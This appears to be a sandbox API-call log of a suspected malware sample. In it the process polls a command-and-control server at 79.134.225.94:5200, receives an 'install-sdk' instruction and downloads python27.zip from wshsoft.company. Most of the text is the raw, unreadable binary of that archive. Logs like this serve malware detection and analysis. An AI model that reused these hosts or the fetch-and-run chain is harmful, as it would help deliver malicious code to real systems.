HttpOpenRequestW March 18, 2021, 12:06 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:06 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:06 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:06 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:06 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:06 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:06 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: install-sdk request_handle: 0x00cc000c	1	1
InternetCrackUrlW March 18, 2021, 12:06 a.m.	url: http://79.134.225.94:5200/moz-sdk flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:06 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /moz-sdk	1	13369356
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: http://wshsoft.company/python27.zip request_handle: 0x00cc000c	1	1
InternetCrackUrlW March 18, 2021, 12:06 a.m.	url: http://wshsoft.company/python27.zip flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:06 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /python27.zip	1	13369356
InternetCrackUrlA March 18, 2021, 12:06 a.m.	url: http://wshsoft.company/python27.zip flags: 0	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: PK'²M= Àÿ(8I"api-ms-win-core-console-l1-1-0.dllí{XSK·öNBïHÐìB^¤i¢ é!4!QPEAT+"(½#6EDAD¹;=úóßûçÜïîæYÉ5kÖ^3³æ5kc Xºt?¿(²l¢·Ø2Æf±ry³½o(2äMÀ =pAD¤;IDú" ¬ìAxVV&ÉeÏ«O³àVh<MýÆ%gQ¿O%-½©\|[_µ!ÃàéxÑ=\ÆÆÐKZ¹8 B.ßQîáÀ\|'ê.ñY6ÐxèÐRp,7æø®àyðýBÀäê2¨iCìß¥@ÄG¡oyJÿ8 ¢ôþ£¶+B À²m:?Êé,OóÊRÔlÈ¢e+u¬yBtª;öSðãekg`g¡W[Óe5¾©vB&ßó#âã}Q¡¨ß@G}ùãQþh{º/+àX3'[²§è[YrçÎîÞ¹å¹PÀ/ÉQ;Nú. ¢)"Û!Þ1Ä7øÅµÒ2HÅN¶eZ·CÑ0Dôk`=D¨¢)¹À¢ 2 ªh"nnèÚÍA$É@ Q9D#1@2XÜ!èD/ ¢ã¦XæM-4ÅôÐÔ1B¾Ê¹ë£§¿? ëïä¡¿Äüð@¼¿Fá®1¸\|«oý]äî÷´l%Då/ZÃ¿Ö÷bY¸ã V^ËU¦Pa8>úCË!fÇûfë~oøÇ[<Îs³JîîªÂÏúþXõ3Çñ request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: ÷Â«-çØ}t"Áßèé'\|ýuµÝo&ç'¾#Áÿcçd¯.9þZÈñW+çÿ®ÿ¿.Ëù ög>Á_ð¡}ÅXÂÙÄÕûàòP>;À ú4l¡;SÀ °Ê¦Ð§tO¹i&¾.¡/À\Ü¸ò½qY ô÷Ó6À)-ì"@\|@ÀÒæøxHs àA2·©2 :õ[ºÕ¼_ $YJxªnH¤7ÈzM¤)8ãÝþs@ºVmQ(µ/$û] t¡²/d/ªbwàÝ@ÖCõ;©Uz "@¾·GC+P ¨¨?êÔ{,¤càH=H'¥½ç²Hm¦¶Sd©ºT ½F'"õ9PüWjk(ÕÖÐeK)W,¤ YFÒ2&ÁÐØQzë øØä<dÏ_?¨FÒä}×J-á©pèÒ#Ð¦Úmµ,é»l÷Êþ©ýKclMµÌâz@uÿzÞ/A,'Äø¤ÿß£ÌhõYxHåÒ¢õó¬þ~N¡x ø®ôÂ/<$©A=Õ@H§ÿ^ @kóòê(ø5VÃ¬%EÇ(o?Ã £çµx!Ö8féhåÙpAZ4§c§ÑÀÈªpM6¨ òâ°C@±Uíh¸3Å¥³ßhû»^csÈ<± æHF\ÈAÀap8dN5ãg¸nÅçT«AÖoÁh!"¨!6ÓÐqÁ7Û¡¹@NJÉêãèM Dsl&=½-Þ3 (Ð-®¥p¸x,\|=A¡A^D¤~!8#úB-Ä@QJ=ÿ{½½oeGÄ#õuA>V´ ¨ª¢U±jXÐª¤Ò¿Å2RÏÌÐµÒGËRK%@}ß`<i`g4´³Ô@cUQJ 2JÆ ¥@¥ýeìðp_<H¯`- ÃØ!1ÁÉ0pV_tö¤ìîz½"5 r<ÉôºûØ9ùØs;Þ·QkVÙ¤£m} 7µöê1ûBþOWèí:=ÎW»<°Vö¸8æÅ»gÊq²mMÔJ$ZxnÓ!&å×ÍCLèÃ-ÜI×ÓMcëlY/ZÄ¼LÙeîÈÇ[RÔiÈÉñ»×Ç:ãË.¦`Ò¦lbòhÛÜÊWÎ~fÚvTFTpþ¿zÎÖ±ÇÛÏwxvm_ÈAízØøJp¦}â½CJN-ÂkCRÍÙD2ó^'{É/ÜSâ,ði(Áj]Îg»w¶ÃFmâ< O1B#B CCÌFÃKÃ=â²Ùíò¬mmÙ£@lÕbÃª KÐð¼±ÜÊØ3½Õ¿¹{´§ÒXf iqa¼¾¬¡¨èAðWX' Å`?_ W:N{yC¿M#e©9¥$:Ñ1@K£17&+e¯¹ü_=Oø Å^).«D0ü´/QVc%úTO4·¼C÷ÍÇ9¯_!ö½d Õ%ìª0wbVV#\|z]Dù>S ¬óÇ7§Ï Â·éé¤ïsîÔÒwTC¦Ðöd¼Ö¸2ûÞÇ~WHýsõÎÊ#çDêD\|÷oÀªE},²ÓÅÆYölQþ¿dq~ÝÞ¨§ª;%ZÎÕµÞz»ÕaÊìö¦¯6jåÐhð½n.Hgû4ÊV<ÎÜÛÏÅ6&§þ~¦AHçºïa&÷ó~}m×´öÎaN³ÍÓ×>ùn+ö£·Vtã3â4¶ß§QØ«è3úAUÔi>WÉÃ_·¿§³=$w/G×F¦:ÅÞ@(ÖùÅ`R.×%¸¥R¢XäÏ(õ·`(¶´èW×{âv¾ÞÖo8¦ ªA ¢Ñhì}/$òßbÛ8¶,øôâRz °ÝæY¥¥B[õ[é{4Í^h2JuÜmnx>R³Ï(D²}¸Ô¾ß¾ï¦§ÝÒEn¤pî>É¯³Ï^Q2[²NFÒ¡¦+>Í¬Yl÷¸[ðFL»½©¶É·Íkr83~ã`Ü/íÆUQo3#é÷ÕÂÙgºêL\|8ryÚmç'Uõ{DÔïlÀ=Ie¸·WëlÌ1§JîÇß C¶½Ú;ß2#¯rUäáÜÍxÛ]åä£V wqíQrr!TëÅßa/XûäÄ\ì#;¼Îóas®âÑZÁ¥íÐ¸þj"VÕÑöýwO6÷Ü<=Ò°]A´¡TsÒ@pQ`ü4=Ê R¢åÇ`ÔÕ@%y4ÎÝKõByà=A2¯Â©`=QêJXP«îñ?à_#çhCG¯¬^UA÷¦ù)&QÐa ÿ¬@s 7üÂ?È!G\|Ø TC)¡QÇTtY «Pû¯!àotwî!U9!UèktÀðÛVFJÆåo÷ãnªzúrC¡Øe¥Ê ÷Nóî¦õ;["o÷(úakgîcAªSFî{sÌèÚtö÷ÞLºÉc¬?0´÷p·½í3c\|xä$Rë_kyÏÊ<.TÂy°òä.¬ÞÑg3{jgù¸ mäý>P¾<þ±Æ»æÛ9rtîóÒÞÅÉyïÍÐÄÑÙ¹#÷ã´5êrDÅeu.²0Ý¾i®U<vâªñÁÉ(%w[0Oëô4q·bïîL¸ämñ,Õ\;P?ÏöHò¾2¾ûYSwú¿ yo±ï¾ ioCpW°wL8%iAj¬þåÜ¨àÁÄ$<µÞ&À-@W1¿ÍÊ/áäw\° À(_/_Ô #ú\|QT,A5%4VWÂ@XY.b(ÅfÿÁJ Î® gð©íH¤^z¸¿¶Ð£ ¦Æ÷c~_Oòrôk÷ ÞPÌÁ/öÝÓ³è&Ï°L ¦Ó>Ef+£ÌB2é.Hõgh½jÓCzö¡rJ¥ ÞÕðyI±ÖÀ:g ¡ïùR°)Gán"{ãÔxÛB·ÐÞò¶=\Xê«øTùkQv0\Ñ¾tþÜqØ}¡±ÞÍm}SkXl%Èr¬¨j©Ñ:Ö«Fçjé@^'G¹aÖcåñªåþÞPëUðÉ(7»}K¢´ÝèÎ¦ZU5Õ²Ë"\ù²7ruÐ¬.btCt® Ø6hD\@v 2pÁ`4´ úZ^¿DfJ5; äñà:Æå3ª~¿ñà-íhËNé©/Ò¶o8:£yû1 ø&Ä §aaÎp¢> û±·ë8Èâú"÷É.Õy¸´^Â2SÐ4ÌÑÏÑßø×±ì[5rm QQÌ~(¯B1µ¿bK\|ÊÑ_ÒúGüÃguíi£7A:W0×v¼aS<g:óÆ-ìùT~1ó×Æ×(t¾DÓnë´X±EZæ·òÎ9dW}ºfJÑÓixÁÂçÛXDÍ1[ßwhF mê¸üêk¢Ða ü ãTª^æûïâE5ËNMÚIÄÉ×&¦ÐO Z~NÌmå<nY'Ôq!øyí¤Ý#ï&ñEWáæ¼ÄJÒ(<æÙ×ùN½pCE·é§ºÈÀ/©\Ão\|_Ï[§N $ýÙÇ¼¹5Òxµ÷;E7U´¿pm<ÁïZåuëM6=ºS¬l°ö °µ»E¬%í!ã»8¶D«6.KÝ²&öþ ÕãÁùIÑ)sL.3ùÞLÄB·(E¾ºÕ5ÓAW4½É³¶¥xñ"l{9ú<§Zº:ù^GÝ§)ë_ß/z0»iKF§xxöÅù£ úíÆøí:õÆ-ß^ zÌ¤Ì°6-:Èfß;;?bÌQì¶hÍ«°»Vlç`ª®oMòÑÔúÃ3Ä.±ºfNæ]÷ÙË²Uî(âÝõw¯äÍ;Î£O= Ñêö¸··¨/çc#®Î×ëìXôÍ81Èq£LÕáQH¦£ð{b¿y}©ø½öÀoPT!ÄÆêüFSJ ¥øÏöÿ½Oçú_éf$·ÛOAàEåàPmºuqK/¿¥$û»ö³íæÅDÉù¾Û>Ç4EH/éR+(ýðÝU9@Ï>ÃF6Ð$Ú¨$¹?kjÚ{íú/»^{e[-a×pxÎ°±m[IÛe=¼Ù3þÉÞ=ëÙ]oYg¤ SoµÙe±~~Ç±c`àþÎ`ÖÜG'¯Üó¹ëÃ »Û2Ãc§MMÆ^2²^çNwÒ6åÍî;ËiÌÍH>½ïíæÈ¯°SÂÖqhôöFQÅ}ýéH]tDSFÿ½É¹8ø5aÖ+_f2Ja-âfö³´5÷Ì+è}³ÿ ½yþ½9V£7Ä@RÚø¤Ã¿ß\Üßîd¨bÞÜM9Åæ¡NÓô\ øÿÔÿK'wh¬9N¬qE¨ô¾.+xÖec»¢@ÙÀÂu±åÎ®£å ]kòÜËáH.ëôÞ:%N§Ö¾ÅUDNjß{7xç(mÝaÁI;^«IÃ¯ïè~2E§x}\NR<xþÓáÈtÖúÁàÛüYGü©å¹êÞ¨Z¶1w×¼ié1³MèMáh-ysÝX°ÖbWÿ=&ÜÉr¾7bj±òÛò«ÞÜfÖÛÕeG{6TDâ]·Àø¸Ù:r§}Ô¼éåt¥øj6.¾ÉÆa4+8Å¿HÝ¼ëSTÕþî²y²ÊtîõZ"¢äIæë+Zõ¯ÌG_8GÄ[ÖH¬gÖ´Mq1Òç¾}õêeïºÓz request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: EO×_9ÿìDéY½¼úV]øY¹Sù^`gcÖï±ëcúAE¡b%Î×.=7Ð<iÒÛQ»yÈ·Ï±º½¼»ÐôÒbµj«Õë,5ÅÛN´ ¬9ÖØ§2k»¯îÁ0Üzªò¬ÓíhñéhÃyÕ«þÃ¢Ð 3\|Çºûþ¼ûü³¾úß,T~ü7ÿÿfñßÚüÿt{ÔUi¾mò#}¿3¤!}½ÿªoÍÂ\|DPkS§oµÅ5ó®ª¯ÞS¯/Ãôàü¶ZÝa:©Ø^~Ñ6áK:-y`±Ozap×¹ñõïäÕ1_Æ³=´ÿµlf»æÈ;vëªs[Üz~}×°åÌ®NYÄÎïÇ\|âB?{J5wÊªco6°{äXüÛG5§ÒÅ¤Á0ú´ü¨Ý¶t5^Ï»ãÚÊ»Ü4,Gb5NÙfhõ<?´C>¸Á½9l÷\|\-×ôáòKçZÁBfR\{G-óªê+ûH9×\|ß¹.M½½²½<ò}\ÍWÂ«+?n.¿Ú¶þ4Ðìý»Eÿ»6ßèþ9/üg?ßXI«DDÉ?PPD6H}TæI\|>efL?¯ý.>¡o×þGtµN¯ç?ðY¾Fç<h»ç8}©yr<SÞ9lwë8çZ¦ìî.ùÝ¼¨3cw§Ê£öÌ³MY ]r}:m0jvÎ[îâÃþêh8k)L»{¾.Ú-,Py5Ò±Ïÿ9« iýÇ!Í3Ý[8»ÔoýgÚ%MÑ·¥bÉÛÞ¼#û$Z×²³e©öÜþZNx¬ÿuËQ¡m9>[ûØ¸Å»vð8¾>Ú £æîõÈÿôEÆ½µuÕEö¡¯L$KÛÒ`^k² ²ýý?æDw¥ÜsÿsyRLP¾¿&Fð÷°½ó¥ÒòÜh¼µ¢°]/9(T î@Rù?ÒIK{;j'1*X²¾Jk`e:)þc'vAa<ÒJZëûyøýôNôFjéâüìß~JJ´Ë C \fDPãû9^ÊLË (á,wp¸Áò@ÓRmÔ{ZUmátÌ·õÔÃ2P!x¶ç®ÜÓç"õ7ú,ªóOJ&ÙX§öÝaqb:ÉÞ}vck³ÀíT÷¯Ú´/÷qNet÷.?a¾À¾¥£}8áÕLÓ6ÇçÚÏ{Ý<ò>Ëu]¦Çô»ë:Rª±Èt©Õ¶ý{Ó#\¼í%ekxófÒ»:µý^ÈæØø¨hÒ¾×JmWDÆÅ7^ÍüÅ¦ÎÊ×gw½¹u.¤Â¹cM¡ÂNÂÜÙÜ±Øf¾ó«t,ìªñ¹Ãjz[óÆèþäK^w{ªû;}ÞÀL{á*ºZÄ{¯ø«a/ÄÐvÞ½?Þ¤aöñ4Ê+ïÿ»÷ÔuüÏF¿i~La@ÁÕ¹1ÖLï'h:©¡ÛäÙæÍ request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: i\|?Qìæ4Ðf8ÔZARHºBÃý«¥Ò@RlÁÿí´æ0í¹Ü66%ù[ÓGFÃÊ>-òü´ãP2iç^?¹¥$¤´åÒ¶îº ÐqÅáÂ B¿ðË<Át_ÛO8]ä5ó3ª~ÞâÊ[7Uw<ïÞÝ ¦ð¤çÇ i~¹ZoöºG#rÎÕâtsÔ¤ª£é&kÝÀÛÅ±H¡qÎÊoð5ór Ëõì¸¯ý~v§aã×³ñí¶¶%ÛHæüÉ½ð¢jÈ¦ð»ïíÒ×¡PNØyhCÒÅ« î¦¿"oÍ©zíß^£}~Cá6w@Áoxä¿úÕMötÆz½,7`æø¿kSìÒ½w,_r4¥ë¿PK'²M;ïþL(8G#api-ms-win-core-datetime-l1-1-0.dllí{ <ß÷ÿ3}-;aìáa,Eö} YJÉ2v1ö c)¥dMBTR !²$iS)DHù?3RêSßÏçÿÿ}?¯Ïÿóúÿ¯;óÜsï=Ï¹çû¾çgm; @Bei ªåKøóÒUø:+p¡C¤ fÚ!bãé <Î~(Wg åGýQ^þ(]kÁ /ÇÂÂ(þGSÃ f\|êJ÷Ç§§~;§åQ¿³SëTº«'¥¥ÂàV òó<Ï¸:äAÙ¡úzG¹#ð½P/pÎ,ô¡ICeÀþu0ûw6Àè\|¿P0XUª¨¯ªClÿÞ%GÂ ov8°,eðû `1è \| õµíý4¿.ó)lÔ bÃ¯<WÚX â#PÛÚØ/+k]ë"¦<;Yû:ßëtyu"EeÎ^h¿ t¨?Ú@Ä£ÝIxíAcÐ \Ë2öeÉ¡ÎËò~«GDD¸¹xPú}]9ür?êÄ©ý ¹J]íâ üâZ%Ä"çù¬êP1J,TÎB¥¡BJTnBet e4ÒâOçèæëàIºY@ôs&i>x¢?ÞW+÷ýªÝoºÙQºÙ@ø·Õôªv¿éf÷+õüÿëÿFÝË¼ý3²/À_Ð b,ï³¤Õ8øõF(B¶5à}êVÐ`Cu#èSº§\µÈÉ/Ë»`Îi¬\|k\|åþ~9à92Â DÀð< n^/8ûîêSCíPQ¥~kS¡Þàè:P? púCÒ8C5<·ÄÉâK â=EíMzS>!tçPæÏñZy¶.T¨c½ ¾ß{A8Õ½ yñTn¹èNÆj÷$Vñ± âô}<\Z0æ£J½ÇA<ÖvThC<)ãÝ¾ö©£0ÔqP T^Jô,HÔçøC3ò]¥gª¬ATY¾JJ¹¢!N0HZ<¤mÊN ÝQfëx³©ç¯ëOjÑ8ùBßß¹QkxªD ú¤Ì6Så¶øÚÓë«Ü+:óÿSùulIÌ ¢ºBmÿyÝÏC,ëÖ ¢Bt Åâÿ6íQV4ú,<Äri¬xÖÏ«úû5 » Ø®-ôâ/,Ä©§ U §ïV @{óÂj/èÕWÃ¬¾A:Á0aFÏ'«óA$.8ahidXp~4¥e¡!ade8¿TyVQØ@ÈGÂ£PdÕ8$çä¥¨\|ì]eóÃz5¥í³4ùd®h¼ gópÎ¡Sß/«NþÒ(a=ÈòM0 $B(U"ÄV$-\|«5\C©Ðs0Ú9yzù{þvB¤ã ³Â»ùüÝ0Bà: ËÌËH"¸P:bèLòFÂvï÷vÊÁ¶&9û ,u´@!¨ cq8pTUYUcþÉAFJ;BËB#J,×üu¼<ñD®µJÏÚ\|£²6ÕÕÇ¢uµô1 ØòÖýrBÖxb+$ÃDW+F È06È`p2ì/¶Úk´Bªví-ïw;ºçÔµ C³}~E~UÇöboåªY»Ø8 3?¬DàòûG4=È¹¿M«¡LîÔ¹bÜ¨j£S°îqãÌ¶ÌJ¥÷ 6Ü]£8ÎÝíÞ-ìóÜgg¯Mü&ý£úØ kàyÌÝlþ{DÏo:33õtCqºÙÒ.G¯7Ã,úÍÁMÇ&eÂÐ¸>©¹ Ãl¸lË¢#¦Ø²u{ ïKa kôÙ"óÂÿyB¿Ïkrf÷ÁÒÁdå9¯=vFg«oÑÇw¼·jx½óËâÙT½+eÝD·=]ï4Â!$Ã ÐJYÜHN®/ÆO{øâ{Ýn=µÖb·¸£ äæSüøØJ?qBóSÈ§K2qØ@Ja¤håäë%èxHåå]¾r~+ë$çJððñ¢På¡pÊ-Ø$ÿm)«H]DÈ(å . =-=´ihè`0¤)h®ÔAxÚ×þêxâàL9(òJ )&ø%þ§ý X ß f5ÖÔ`t}MKnùÊ6\±Aêt§é¬³;Ö,È^<·ø½ýþÎøtÚlìNÞiË¥\V×~×i¬Utâ>?5±9Ò Ýg¯ÜyTuÐÁÞN6-Ëþö\|YP÷ùÃ§îM¡ÈJi9HÆÈfàý:ôÁTþþP³íV#n×Ç©"Ûñ¶-½=)Å´=ïÂ±x!¢q,v\|`{ÿlHÅ×T¢v¨0Ü»){Áh/çKHçûD«w\|N@1§!ªc«ÙRÑ«sìBðA+"ÿz©L®Z£¯Øéi)·{yºÍ(5àÕQ+gÉñVB±7õ\|G1XÄ¶Ê±f§WûÅÂÿ¬E7=ÿêv7<ÊÚËÃâú ÇAb0Ü2}¯1ä¿E¶qìkoÄozÿ).ó´Þz.¯¢B`NÝC5IE9Zm.[®ºÝQ±NÈ)çG±¾»BèÞg3{£ý V«b%X'~u4¯öeqhÐEEð6É1´ýxòÔ#ZôlõäÜÆ¥n×ú¢7"»ÛiÚ½îºO½ÌMÐ?»Ømð¹§.\|b)4\|ìJÛüóÞ'¦n/$^Apt»ñ¸®u¯êMÎ³6ÐßU¿¡´!sÌ¾ÖsÿdÊÄPÿÔÝ×±:çdÎ°Ý^¸`Õ¦¥6÷P?¿k#ßÛøI¿îðÒÒ[EéýßâÎq2E"ÏõmG=Yê¸ÔWpi¤Ç_íSÄ°:<âÇ¨óö±n§øÖÙá¶]rÊàJó$Eú îOË£b)5,VUTÁ8»¸«âqîhW¼VÄâÐÎJ87´ªTÅ©ºãAüøwgÍHÛ½ËÜö°Ve9nîk¦ÙÂ í2þYæC ÷¿)CÙ°¨VÀ !©¸m®BÀÍ Ãô+¸s ¬Ë¬k¦µ7hÔC¢j,ôª&ö9_SÎ~òjS±ÈÚM7Op{ï¡ñ9].cý`Ïí(ÇGüºuÙjú.±ù&´w5ýc¯gÌã2Ðy>{¨×Æêñ©±MÏ¹dJÅ2ZGÕM<æ¥nÏñ+8»2qùå,nðîß2Q5nkÁov«Y.§wlÿã÷?u³ðiÞ0åËÞ¹)÷æ¡ÉäùÃ·â7«=oÉMÚ y±æ©zÙXæ%«Sá ro·73Íj>lçìÂÕG$÷0ëË0Ýì¯ShKs8-î²nÿ<ÿwI»c¾xl7íÚij ¸+Z;FgI~ª¯ùå¨àÁÈ6#ëããF@ÇðQ¼ÆUDoëA2Ë¸ þ¬ òr÷ru&áQZÁ$OÑNÅ2TQÀ`±U,eØ¯U,¥úOÂì!XÑÁt«ÌÞBi±öÝ,ðÐ~gzÌçËQnöçI±üWåó±ãKý7µÍÅz@Î1±í<ÊhvÊ³ÔÌäPqm¸I`ÝÏyÁû»ÎéF=é{W;£TÔê¨÷´¼LýùzÏ£ü§A¶Ó<é/?ãÒùBBõbãU¸ïm§¹îau¨¸ÂKþ ÓTÒÁyg ÃÇ{\>ßiuÒÇX^âx© v7°¯½l®U?ÒQ BïhnK^/M½jòÐÂõõ=´Ë´úëRzà~ÁñîíIÖ#ggô»ÕT_u,æ9~èÎd[µR'DÏ í4² d£ ¶¤Ð×ôú%0QÙHÈÀµ´_c.Êò~¿Ñà.»1æ=2^díÚtC8¥Vó ò}ëÄ G21B1%RÔ´~À2ÖRò.M[©£ÃÒ/3^ËXfzù:ùZ Ë¾5!Ó¦@ÅlV¡!òSùk(¶L§le®Ä/8pPÝ%©_þ y[éýUÞÿÑÜ§à ÓMè:eL_î¢1'ÅÚw[fEì(U7½^xÆ6w( ºêòÇðJ#âÜæ1¨¶Ì<^wsQè&Ë[¶è!ã{5¯Ï°"mW0±ÉÐÎ~7ùv(AXQÊ6{ÊZ,^º¼.m0NpfÐücRAÛGqyÀ½dbt _ÿÇuSÖ<ÚE; j¥Â]mu·tÌ´·}×Ów}rþ>ë¿XÁñò×ëBÙ-2ì¬øÃÇúÞ.¬dÀ«¤OGWw¿°¹ÉëØãvz&ht}£LQwÝ[v.~`Ç3ÜvÎ¬ÛoãY,üX9ÌÕwo0Ì%v¿ request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: ß@@a0¢a~9D!øcL©Ñ2; a2n¥ 1Èò¾²s`DÀ~ë õxs8hAöÂ9·KõL4OØ,ù²bËê§sdá´þ7òór@;à{ÖCENQ'¡³ ÍæÇTÅTþÓ¿´Ä)ë¨ ±º££¢ýiOfí\Û@ÈµuXqmb¤©®-ü_àÚb°%nÅµª¸ûoT_Tðwy¶¿æØ²Ô®9°5¾ÈqôýBWºÉ½· ÇØíi"ëÔÔ8ì\|3äêfwíS\ÖRH°`'ÇáÝÎ ÃEPmz×þ8æfUô´¥>í$É'õXî½7é¨ßµß¥?co"9{¤8ÅØ\ìJ3Mm¸ujG·3ÿúfþùèêçEý)AqµD~å&n.w\|V².= m¦¹¥-v³GÔ{÷zD¦îÞÉ»&ý³Û.fÄL=1§M¹²7¶îÂè±µ×òº×OÏ>u«-5 ÒÂ:kê[uwìäÎÑX8¶¯ þGÇ¶×u£ãÌw:»õ<·Åûmýÿím>Õ±¥Ló_äÛÒ½Ú¿e°ùyFL B=ïdáÒSíï17ºhK¾,Øùñn6¹·z¼=V{ûÌq¡ù ;z-dÝµ®Y'µÏîZ{ ¤]SS+ç©#ÏãüN\¸ iR½¥¼.ª9jFyÏ6u3ÇÂS¬r6÷òá1øÇ%>/ow~h& ®¸¨Z×¢83ÙaCÍÏÈ'°ÆR·Ë¹2\|X¡ÚÅ)»ÏNstºóû¤%o¨gMÆL)ªã\|Æ®y"~¹'Õ¢ödz ;åwïEî¼à¢Ê£ôÙæbÆÌ¢ÚãüçÚ±UÑ9¢¨Ja·ñ¹Ùº½®lrªv!gi°%r_w>½æNö#Vìè¦»§ïNîz±)a`)KÞùÉK!Bíô`à5®(mãÞ läãÃssýÄ½Î>Ð;§JU«Çï<"_&vÎVÅÃ¢? $JÛ¨VlÒÂ²õXÄ¾ Mô¯²Ðc+ÈÝð¾^ÞFJd®¥ÔüÉúª%}§µ[»ø´Ì'ÌKg\ãöT°&®ï¸-RîPyþ©®ÚQËÀ÷¶yõÛ5t÷õÛ_}b©Ûa1'Ä§"_ÓeO#7Éo{2É µ®÷Ò^ýõ'J}=NÉý¤ýFk¡ç1HF4¬ú³WKö/Ù5.ÿ÷ëÙOÒWÿNaõ¿YPªÿÊÃÿOÏ©ã¢"íÂhNf_=R}÷ )$åNUgµt§ÌI§Ë>ÁYÁë£Ë²¯Ê»w%ÇÀ-«¹ØálJØ¼ÐÁð9qþø/äùo¢¬9zÙ?u<û@§# ¬üØ1äØ³ó·ûzÊ<oZæXuCåäò ²·7Î÷E'Ç4ÐhÖ+¦Õ ²M¦!ïè\|±¿WjùúZeÜôíºñ¹l¯¾rÃ¨RLw@ÆÎé;í ÞiÀØ«kÅJA¬UÌÓòg£Ürä²8ëõ»$-ÔhÅ-D¯¦²ñÃùs7tÄõÇO}.Ë-Þap9'P³Y^yå)qÍ÷S¾(È%þ> þâÄ½u¦=çÚZ/üx¸üêØú.ÐúA«÷Cîóß:\~Ãûç¼ðý\|c%Y¼+õ-]'ÿ='ÂÃXó:M`yÞG× ¶½lØý=âQ3BÐhÕ4 :§öZÜåß3¢"È©$Xü8ÐÖdÍ9É!gt37Ý{ë§¦¢?zÍªÀq0·Èl·àÍÑ43}"·ä\|ÜRZè³ºÍâMd¾Sò¾Ú¤ìQ·Ò/ùÛ7¡¶ÚÓ_h¼sºÆAÖL;ebû%P.õtÚaóhæó%áq«ÝìåQ b}lÇÚ½oÍÊ »eó±ÒÍe³âÏ8fÄäîµþ.E¤¬¯C¶®r?ñ@S[vÿy+5?U¹vZsq#´\|;ð`ÑS²Ép'jà>Xðï %¡)\|Màrs\|²ÚO7 Æ{t;ýî!òcÀE1Õ`LÕ?2Iskê$±JJ8´¢>Z§«7,ORôÇI¢¬ ÁDW<ÊÌ9Öñ%¸úüôN<³EyÙ¾~XePaÛ AüJC!ë[aä¡ÄøÅe>àð5~pÈ¥£Þó,w/9Mé ´j8ù¡®ù =e{hWÁÊ½P\ô¯þ Àöî§Ç/e5´4h¹ÕÓ±)o?íxá ý¸%n¶?É¹@êzpO-A³¢´Û¥mèÂÈ4;ïê¬÷9VïðâÄ¡ÓÍU÷Sh"ëüÉ¦ðæ¬ù±´ãÓ²õR»RâÓðVÊÛæmâÈåuL_;ÒæË®xøÌÿ,¿í^VÑ/ûýÄ}+[xü\&¼&\|ÅÍSóë#¾þ<½+²×Ýdnl½5¢íà°kqÜic®hO)÷7³=9á36Zm¢(n¨ÙVÚ[ÒÊØÓÌzd\|Ë)«=Gvqö\|Â®K¶66È®â®À²M×30dø{hëMS·^Ú?ë4üÖù1cùW§ÇX~Ègü!VKN0&Þðf0Ù:VRÝÀ¸GYýípÂUõöÏs 8 ÀYÅÎ¹Æt1í`ÌE$ç¯v/ÆDíý¿QYÐaÛö÷Â½:Ëez7_h÷Ùø±°J2ëöGu>ËìlçÇúÏïõl)ÊÊ6u¶ÅéøõxN{wù¤ç\|_¯Ç vG8yÓTèí¿¹ôXxÊÚ©¨àôó45ÏB.Þ<ÿºÑp§Æ§~M×t¨ÞÚb«<ØJçoÖíªy·ÁíC©Sr·×Yõñ')#íÒÁ}cgÔ:kIÛ§îíÁ±§&_?)/¡§-Ø´Yr¤Sò`ÊµûìæO>¥S}Ù0^~óùW/Ò¯\ºÑÛ¡a6íòäé5Û¼±ÞRåñË#æ'_TËg±äûóY]lÄõr11ÆPþ5ø_PK'²MYç^(8G api-ms-win-core-debug-l1-1-0.dllí\|TKóïl gP2¸df¬ä(sTâã²$QEP $DEÅ I" (ovE¯7¼÷ÿî¹ï{ç§w·«»kª««]U3hd@ÊÊ T«:ð×©/ãßk4÷ªa÷,½¼CPAø@O¼?ÊÍ% rÅ¡ð¡(ï¶Ê?Ð'ÅÀ@+¼Æ£Ç®á,=îÔzÀ¥ä¿]RÎ¿³NÖ=Étso7/R?S0ÁÖù9Öuyú¸<äA¡ZûEú Zà{!_à]OéCÌym0ów6ðÀï ¦êCE uh%ð»¤¸ôÍÉJ4Oø}Pà,Á»k²¡ÖúQþØO}m×uHb£Kf¨¬ñ\oc;TN@m'~jc~¼Ì-´-}Ma]ÍZÓ4§^$¹y£ýCÐáÞh·@<ís õDûaÐ4(äîúóªÎ¤ðî.UyJ¿Õ÷îÝëîêIê·¶R¸Õ~äûAs1¤.Îíâ üâZ)Ä$çºùlêPÙ }P)ÊC¨¬@%' RIÒh¤?ÄÏÑÝÏÐ&4ñ8_ÀÀùÉ`¥6ÐôCÈOÞÁ¾÷ú}I(!(@¦ZðÞß{ÿ¢íw$?énó+MýÿëÿíFÞËó3´/À_Ði ²XÝgÇ6âàÚ>À úÔÌ¡_ú `Õõ¡O]è7éªC¾ÿººûh&àÚú·Ú$ôï'úá¤ÀÞ@à qóüÄ9ð¡>µä> %ò·&ê v®õñ¨$$TÃyAÜ ¾@T< { È½ñPoÒ§Dñ~¤ù3C¼Öï òXo¨ï÷^ Õ½!yqdn$¹CWè6$!Ôîlàc 